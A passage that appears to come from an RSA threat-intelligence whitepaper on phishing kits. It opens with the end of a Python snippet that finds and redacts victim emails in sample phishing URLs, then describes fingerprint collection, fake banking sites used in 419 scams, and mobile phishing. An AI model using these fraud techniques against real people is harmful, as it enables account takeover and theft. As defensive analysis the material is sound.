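# Constructed sample URLs (example hosts and addresses only).
SAMPLE_PLAIN = "http://hijacked.test/kit/index.php?id=victim@example.com&x=1"
SAMPLE_B64 = ("http://hijacked.test/kit/index.php?id="
              + base64.b64encode(b"victim@example.com").decode() + "&x=1")

if __name__ == "__main__":
    for u in (SAMPLE_PLAIN, SAMPLE_B64):
        print(find_victim_identifiers(u), "->", redact_victim_identifiers(u))
```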
Collecting Statistics
Statistics collection is another popular feature fraudsters like to implement in their attacks.
Sometimes it is done using online services, but most of the time this feature is incorporated as
part of a phishing kit. User information like screen resolution, IP address, language preferences in
the browser, etc. allows fraudsters to mimic a victim’s online “fingerprint” to try and log in to their
online accounts, avoiding detection by the online-security monitoring solutions deployed on legitimate
websites.
The 419 Scam
The 419 (Nigerian) scam is one of the oldest fraud schemes on the internet. And surprisingly,
enough people still fall victim to this simple and often humorous fictional cover story that
purportedly offers to share millions of dollars with the victim, if only they first provide a small
deposit to start the process… Now, in order to add greater believability or a trust factor to this
scam, fraudsters developed sites that imitate online banking, where the victims are given a set of
prepared account credentials to login. Usually, their name is displayed after they login, and they
can see that there are thousands or millions of dollars in their account. Once they gain this little
measure of the victim’s trust, the rest of the standard 419 scam can be played out more easily.
Smartphones Always At Our Side
We are now living in the ‘smartphone era’, where all sorts of tiny mobile devices with vast
computing and communication abilities are always at our side – fraudsters take into consideration
that victims are now more ‘attached’ to their email than ever before. Many of us check our
messages much more frequently, especially if we have a notification sound set on our device. And
accordingly, more and more fraudsters modify their phishing sites to accommodate mobile
browsers. Therefore, despite the rising awareness of online fraud in the general population and
the media, phishing remains one of the most dangerous cyber-threats.
www.rsa.com
ABOUT RSA
RSA helps more than 30,000 customers around the world take command of their security posture by partnering to build and
implement business-driven security strategies. With RSA's award-winning cybersecurity solutions, organizations can effectively
detect and respond to advanced attacks; manage user identities and access; and reduce business risk, fraud and cybercrime. For
more information, go to www.rsa.com.
ABOUT RSA FRAUDACTION
RSA FraudAction is a managed threat intelligence service which provides global organizations with 24x7 protection and shutdown
against phishing, malware, rogue mobile apps and other cyber attacks that impact their business. Supported by 150 analysts in
RSA’s Anti-Fraud Command Center, the RSA FraudAction service analyzes millions of potential threats every day and has enabled
the shutdown of more than one million cyber attacks.
EMC2, EMC, the EMC logo, RSA, and the RSA logo, are registered trademarks or trademarks of EMC Corporation in the United States and other countries. VMware is a
registered trademark or trademark of VMware, Inc., in the United States and other jurisdictions. © Copyright 2016 EMC Corporation. All rights reserved. Published in the USA.